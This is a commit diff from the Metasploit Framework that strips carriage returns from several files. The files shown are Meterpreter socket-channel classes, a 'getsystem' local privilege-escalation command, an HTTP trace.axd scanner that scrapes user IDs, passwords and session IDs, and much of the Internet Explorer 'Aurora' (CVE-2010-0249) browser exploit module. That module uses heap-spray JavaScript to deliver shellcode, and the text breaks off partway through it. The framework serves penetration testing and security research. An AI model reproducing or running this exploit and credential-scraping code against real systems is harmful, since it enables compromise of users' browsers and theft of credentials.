remove carriage returns

git-svn-id: file:///home/svn/framework3/trunk@9140 4d416f70-5f16-0410-b530-b9f4589650da
Joshua Drake 2010-04-26 18:29:24 +00:00
parent e3a1c63e98
commit a953c47cfb
9 changed files with 1699 additions and 1699 deletions


@ -1,167 +1,167 @@
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/channels/stream'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class TcpServerChannel < Rex::Post::Meterpreter::Channel
#
# This is a class variable to store all pending client tcp connections which have not been passed
# off via a call to the respective server tcp channels accept method. The dictionary key is the
# tcp server channel instance and the values held are an array of pending tcp client channels
# connected to the tcp server channel.
#
@@server_channels = {}
class << self
include Rex::Post::Meterpreter::InboundPacketHandler
#
# This is the request handler which is registerd to the respective meterpreter instance via
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
# received and store it in the respective tcp server channels list of new pending client channels.
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
#
def request_handler( client, packet )
if( packet.method == "tcp_channel_open" )
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( cid == nil or pid == nil )
return false
end
server_channel = client.find_channel( pid )
if( server_channel == nil )
return false
end
params = Rex::Socket::Parameters.from_hash(
{
'Proto' => 'tcp',
'LocalHost' => localhost,
'LocalPort' => localport,
'PeerHost' => peerhost,
'PeerPort' => peerport,
'Comm' => server_channel.client
}
)
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
client_channel.params = params
if( @@server_channels[server_channel] == nil )
@@server_channels[server_channel] = []
end
@@server_channels[server_channel] << client_channel
return true
end
return false
end
def cls
return CHANNEL_CLASS_STREAM
end
end
#
# Open a new tcp server channel on the remote end.
#
def TcpServerChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# add this instance to the class variables dictionary of tcp server channels
@@server_channels[self] = []
end
#
# Accept a new tcp client connection form this tcp server channel. This method does not block
# and returns nil if no new client connection is available.
#
def accept_nonblock
result = nil
if( @@server_channels[self].length > 0 )
channel = @@server_channels[self].shift
result = channel.lsock
end
return result
end
#
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
# if no timeout is specified.
#
def accept( opts={} )
timeout = opts['Timeout'] || -1
if( timeout == -1 )
result = _accept
else
begin
::Timeout.timeout( timeout ) {
result = _accept
}
rescue Timeout::Error
result = nil
end
end
return result
end
protected
def _accept
while( true )
if( @@server_channels[self].empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = accept_nonblock
break if result != nil
end
return result
end
end
end; end; end; end; end; end; end
require 'timeout'
require 'thread'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/channels/stream'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class TcpServerChannel < Rex::Post::Meterpreter::Channel
#
# This is a class variable to store all pending client tcp connections which have not been passed
# off via a call to the respective server tcp channels accept method. The dictionary key is the
# tcp server channel instance and the values held are an array of pending tcp client channels
# connected to the tcp server channel.
#
@@server_channels = {}
class << self
include Rex::Post::Meterpreter::InboundPacketHandler
#
# This is the request handler which is registerd to the respective meterpreter instance via
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
# received and store it in the respective tcp server channels list of new pending client channels.
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
#
def request_handler( client, packet )
if( packet.method == "tcp_channel_open" )
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( cid == nil or pid == nil )
return false
end
server_channel = client.find_channel( pid )
if( server_channel == nil )
return false
end
params = Rex::Socket::Parameters.from_hash(
{
'Proto' => 'tcp',
'LocalHost' => localhost,
'LocalPort' => localport,
'PeerHost' => peerhost,
'PeerPort' => peerport,
'Comm' => server_channel.client
}
)
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
client_channel.params = params
if( @@server_channels[server_channel] == nil )
@@server_channels[server_channel] = []
end
@@server_channels[server_channel] << client_channel
return true
end
return false
end
def cls
return CHANNEL_CLASS_STREAM
end
end
#
# Open a new tcp server channel on the remote end.
#
def TcpServerChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# add this instance to the class variables dictionary of tcp server channels
@@server_channels[self] = []
end
#
# Accept a new tcp client connection form this tcp server channel. This method does not block
# and returns nil if no new client connection is available.
#
def accept_nonblock
result = nil
if( @@server_channels[self].length > 0 )
channel = @@server_channels[self].shift
result = channel.lsock
end
return result
end
#
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
# if no timeout is specified.
#
def accept( opts={} )
timeout = opts['Timeout'] || -1
if( timeout == -1 )
result = _accept
else
begin
::Timeout.timeout( timeout ) {
result = _accept
}
rescue Timeout::Error
result = nil
end
end
return result
end
protected
def _accept
while( true )
if( @@server_channels[self].empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = accept_nonblock
break if result != nil
end
return result
end
end
end; end; end; end; end; end; end


@ -1,192 +1,192 @@
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class UdpChannel < Rex::Post::Meterpreter::Channel
#
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
#
include Rex::Socket::Udp
#
# We are a datagram channel.
#
class << self
def cls
return CHANNEL_CLASS_DATAGRAM
end
end
#
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
#
def UdpChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
},
{
'type' => TLV_TYPE_PEER_HOST,
'value' => params.peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => params.peerport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# the instance variable that holds all incoming datagrams.
@datagrams = []
end
#
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
#
def timed_read( length=65535, timeout=def_read_timeout )
result = ''
begin
Timeout.timeout( timeout ) {
while( true )
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = self.read( length )
break
end
}
rescue Timeout::Error
result = ''
end
return result
end
#
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
# datagrams which the remote end of this channel has received and are in the
# queue.
#
def recvfrom( length=65535, timeout=def_read_timeout )
result = nil
# force a timeout on the wait for an incoming datagram
begin
Timeout.timeout( timeout ) {
while( true )
# wait untill we have at least one datagram in the queue
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
# grab the oldest datagram we have received...
result = @datagrams.shift
# break as we have a result...
break
end
}
rescue Timeout::Error
result = nil
end
# if no result return nothing
if( result == nil )
return [ '', nil, nil ]
end
# get the data from this datagram
data = result[0]
# if its only a partial read of this datagram, slice it, loosing the remainder.
result[0] = data[0,length-1] if data.length > length
# return the result in the form [ data, host, port ]
return result
end
#
# Overwrite the low level sysread to read data off our datagram queue. Calls
# to read() will end up calling this.
#
def sysread( length )
result = self.recvfrom( length )
return result[0]
end
#
# Overwrite the low level syswrite to write data to the remote end of the channel.
# Calls to write() will end up calling this.
#
def syswrite( buf )
return _write( buf )
end
#
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
# remote peer host/port via the remote end of the channel.
#
def send( buf, flags, saddr )
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
addends = [
{
'type' => TLV_TYPE_PEER_HOST,
'value' => peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => peerport
}
]
return _write( buf, buf.length, addends )
end
#
# The channels direct io write handler for any incoming data from the remote end
# of the channel. We extract the data and peer host/port, and save this to a queue
# of incoming datagrams which are passed out via calls to self.recvfrom()
#
def dio_write_handler( packet, data )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( peerhost and peerport )
@datagrams << [ data, peerhost, peerport ]
return true
end
return false
end
end
end; end; end; end; end; end; end
require 'timeout'
require 'rex/sync/thread_safe'
require 'rex/socket/udp'
require 'rex/socket/parameters'
require 'rex/post/meterpreter/extensions/stdapi/tlv'
require 'rex/post/meterpreter/channel'
module Rex
module Post
module Meterpreter
module Extensions
module Stdapi
module Net
module SocketSubsystem
class UdpChannel < Rex::Post::Meterpreter::Channel
#
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
#
include Rex::Socket::Udp
#
# We are a datagram channel.
#
class << self
def cls
return CHANNEL_CLASS_DATAGRAM
end
end
#
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
#
def UdpChannel.open(client, params)
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
[
{
'type' => TLV_TYPE_LOCAL_HOST,
'value' => params.localhost
},
{
'type' => TLV_TYPE_LOCAL_PORT,
'value' => params.localport
},
{
'type' => TLV_TYPE_PEER_HOST,
'value' => params.peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => params.peerport
}
] )
c.params = params
c
end
#
# Simply initilize this instance.
#
def initialize(client, cid, type, flags)
super(client, cid, type, flags)
# the instance variable that holds all incoming datagrams.
@datagrams = []
end
#
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
#
def timed_read( length=65535, timeout=def_read_timeout )
result = ''
begin
Timeout.timeout( timeout ) {
while( true )
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
result = self.read( length )
break
end
}
rescue Timeout::Error
result = ''
end
return result
end
#
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
# datagrams which the remote end of this channel has received and are in the
# queue.
#
def recvfrom( length=65535, timeout=def_read_timeout )
result = nil
# force a timeout on the wait for an incoming datagram
begin
Timeout.timeout( timeout ) {
while( true )
# wait untill we have at least one datagram in the queue
if( @datagrams.empty? )
Rex::ThreadSafe.sleep( 0.2 )
next
end
# grab the oldest datagram we have received...
result = @datagrams.shift
# break as we have a result...
break
end
}
rescue Timeout::Error
result = nil
end
# if no result return nothing
if( result == nil )
return [ '', nil, nil ]
end
# get the data from this datagram
data = result[0]
# if its only a partial read of this datagram, slice it, loosing the remainder.
result[0] = data[0,length-1] if data.length > length
# return the result in the form [ data, host, port ]
return result
end
#
# Overwrite the low level sysread to read data off our datagram queue. Calls
# to read() will end up calling this.
#
def sysread( length )
result = self.recvfrom( length )
return result[0]
end
#
# Overwrite the low level syswrite to write data to the remote end of the channel.
# Calls to write() will end up calling this.
#
def syswrite( buf )
return _write( buf )
end
#
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
# remote peer host/port via the remote end of the channel.
#
def send( buf, flags, saddr )
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
addends = [
{
'type' => TLV_TYPE_PEER_HOST,
'value' => peerhost
},
{
'type' => TLV_TYPE_PEER_PORT,
'value' => peerport
}
]
return _write( buf, buf.length, addends )
end
#
# The channels direct io write handler for any incoming data from the remote end
# of the channel. We extract the data and peer host/port, and save this to a queue
# of incoming datagrams which are passed out via calls to self.recvfrom()
#
def dio_write_handler( packet, data )
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
if( peerhost and peerport )
@datagrams << [ data, peerhost, peerport ]
return true
end
return false
end
end
end; end; end; end; end; end; end


@ -1,98 +1,98 @@
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The local privilege escalation portion of the extension.
#
###
class Console::CommandDispatcher::Priv::Elevate
Klass = Console::CommandDispatcher::Priv::Elevate
include Console::CommandDispatcher
ELEVATE_TECHNIQUE_NONE = -1
ELEVATE_TECHNIQUE_ANY = 0
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
"Service - Named Pipe Impersonation (In Memory/Admin)",
"Service - Named Pipe Impersonation (Dropper/Admin)",
"Service - Token Duplication (In Memory/Admin)",
"Exploit - KiTrap0D (In Memory/User)"
]
#
# List of supported commands.
#
def commands
{
"getsystem" => "Attempt to elevate your privilege to that of local system."
}
end
#
# Name for this dispatcher.
#
def name
"Priv: Elevate"
end
#
# Attempt to elevate the meterpreter to that of local system.
#
def cmd_getsystem( *args )
technique = ELEVATE_TECHNIQUE_ANY
desc = ""
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
getsystem_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
)
getsystem_opts.parse(args) { | opt, idx, val |
case opt
when "-h"
print_line( "Usage: getsystem [options]\n" )
print_line( "Attempt to elevate your privilege to that of local system." )
print_line( getsystem_opts.usage )
return
when "-t"
technique = val.to_i
end
}
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
print_error( "Technique '#{technique}' is out of range." );
return false;
end
result = client.priv.getsystem( technique )
# got system?
if result[0]
print_line( "...got system (via technique #{result[1]})." );
else
print_line( "...failed to get system." );
end
return result
end
end
end
end
end
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# The local privilege escalation portion of the extension.
#
###
class Console::CommandDispatcher::Priv::Elevate
Klass = Console::CommandDispatcher::Priv::Elevate
include Console::CommandDispatcher
ELEVATE_TECHNIQUE_NONE = -1
ELEVATE_TECHNIQUE_ANY = 0
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
"Service - Named Pipe Impersonation (In Memory/Admin)",
"Service - Named Pipe Impersonation (Dropper/Admin)",
"Service - Token Duplication (In Memory/Admin)",
"Exploit - KiTrap0D (In Memory/User)"
]
#
# List of supported commands.
#
def commands
{
"getsystem" => "Attempt to elevate your privilege to that of local system."
}
end
#
# Name for this dispatcher.
#
def name
"Priv: Elevate"
end
#
# Attempt to elevate the meterpreter to that of local system.
#
def cmd_getsystem( *args )
technique = ELEVATE_TECHNIQUE_ANY
desc = ""
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
getsystem_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
)
getsystem_opts.parse(args) { | opt, idx, val |
case opt
when "-h"
print_line( "Usage: getsystem [options]\n" )
print_line( "Attempt to elevate your privilege to that of local system." )
print_line( getsystem_opts.usage )
return
when "-t"
technique = val.to_i
end
}
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
print_error( "Technique '#{technique}' is out of range." );
return false;
end
result = client.priv.getsystem( technique )
# got system?
if result[0]
print_line( "...got system (via technique #{result[1]})." );
else
print_line( "...failed to get system." );
end
return result
end
end
end
end
end
end


@ -1,121 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanDir
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
], self.class)
register_advanced_options(
[
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
], self.class)
end
def run_host(target_host)
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
begin
turl = tpath+'trace.axd'
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => 'TRACE_AXD',
:data => "trace.axd"
)
if datastore['TRACE_DETAILS']
aregex = /Trace.axd\?id=\d/
result = res.body.scan(aregex).uniq
result.each do |u|
turl = tpath+u.to_s
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
]
print_status ("DETAIL: #{turl}")
reg_info.each do |reg|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
str = result.to_s.chomp
if reg.to_s.include?"APPL_PHYSICAL_PATH"
print_status ("Physical Path: #{str}")
elsif reg.to_s.include?"UserId"
print_status ("User ID: #{str}")
elsif reg.to_s.include?"Password"
print_status ("Password: #{str}")
elsif reg.to_s.include?"AspFilterSessionId"
print_status ("Session ID: #{str}")
elsif reg.to_s.include?"LOCAL_ADDR"
print_status ("Local Address: #{str}")
elsif result.include?"Via"
print_status ("VIA: #{str}")
elsif reg.to_s.include?"ALL_RAW"
print_status ("Headers: #{str}")
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanDir
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP trace.axd Content Scanner',
'Version' => '$Revision: 7605 $',
'Description' => 'Detect trace.axd files and analize its content',
'Author' => ['c4an'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
], self.class)
register_advanced_options(
[
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
], self.class)
end
def run_host(target_host)
tpath = datastore['PATH']
if tpath[-1,1] != '/'
tpath += '/'
end
begin
turl = tpath+'trace.axd'
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
report_note(
:host => target_host,
:proto => 'HTTP',
:port => rport,
:type => 'TRACE_AXD',
:data => "trace.axd"
)
if datastore['TRACE_DETAILS']
aregex = /Trace.axd\?id=\d/
result = res.body.scan(aregex).uniq
result.each do |u|
turl = tpath+u.to_s
res = send_request_cgi({
'uri' => turl,
'method' => 'GET',
'version' => '1.0',
}, 10)
if res
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
]
print_status ("DETAIL: #{turl}")
reg_info.each do |reg|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
str = result.to_s.chomp
if reg.to_s.include?"APPL_PHYSICAL_PATH"
print_status ("Physical Path: #{str}")
elsif reg.to_s.include?"UserId"
print_status ("User ID: #{str}")
elsif reg.to_s.include?"Password"
print_status ("Password: #{str}")
elsif reg.to_s.include?"AspFilterSessionId"
print_status ("Session ID: #{str}")
elsif reg.to_s.include?"LOCAL_ADDR"
print_status ("Local Address: #{str}")
elsif result.include?"Via"
print_status ("VIA: #{str}")
elsif reg.to_s.include?"ALL_RAW"
print_status ("Headers: #{str}")
end
end
end
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end


@ -1,161 +1,161 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
'License' => MSF_LICENSE,
'Author' =>
[
'unknown',
'hdm' # Metasploit port
],
'Version' => '$Revision$',
'References' =>
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer "Aurora" Memory Corruption',
'Description' => %q{
This module exploits a memory corruption flaw in Internet Explorer. This
flaw was found in the wild and was a key component of the "Operation Aurora"
attacks that lead to the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published to the Wepawet
malware analysis site. The technique used by this module is currently identical
to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
},
'License' => MSF_LICENSE,
'Author' =>
[
['MSB', 'MS10-002'],
['CVE', '2010-0249'],
['OSVDB', '61697'],
['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'Compat' =>
{
'ConnectionType' => '-find',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Jan 14 2009', # wepawet sample
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
if (request.uri.match(/\.gif/i))
data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
send_response(cli, data, { 'Content-Type' => 'image/gif' })
return
end
var_boom = rand_text_alpha(rand(100) + 1)
var_element = rand_text_alpha(rand(100) + 1)
var_event = rand_text_alpha(rand(100) + 1)
var_loaded = rand_text_alpha(rand(100) + 1)
var_loaded_arg = rand_text_alpha(rand(100) + 1)
var_memory = rand_text_alpha(rand(100) + 1)
var_spray = rand_text_alpha(rand(100) + 1)
var_i = rand_text_alpha(rand(100) + 1)
var_el_array = rand_text_alpha(rand(100) + 1)
bleh = rand_text_alpha(3);
var_grab_mem = rand_text_alpha(rand(100) + 1)
var_unescape = rand_text_alpha(rand(100) + 1)
var_shellcode = rand_text_alpha(rand(100) + 1)
var_span_id = rand_text_alpha(rand(100) + 1)
var_start = rand_text_alpha(rand(100) + 1)
rand_html = rand_text_english(rand(400) + 500)
html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<script>
var #{var_element} = "COMMENT";
var #{var_el_array} = new Array();
for (i = 0; i < 1300; i++)
{
#{var_el_array}[i] = document.createElement(#{var_element});
#{var_el_array}[i].data = "#{bleh}";
}
var #{var_event} = null;
var #{var_memory} = new Array();
var #{var_unescape} = unescape;
function #{var_boom}()
{
var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
}
function #{var_loaded}(#{var_loaded_arg})
{
#{var_boom}();
#{var_event} = document.createEventObject(#{var_loaded_arg});
document.getElementById("#{var_span_id}").innerHTML = "";
window.setInterval(#{var_grab_mem}, 50);
}
function #{var_grab_mem}()
{
p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
for (i = 0; i < #{var_el_array}.length; i++)
{
#{var_el_array}[i].data = p;
}
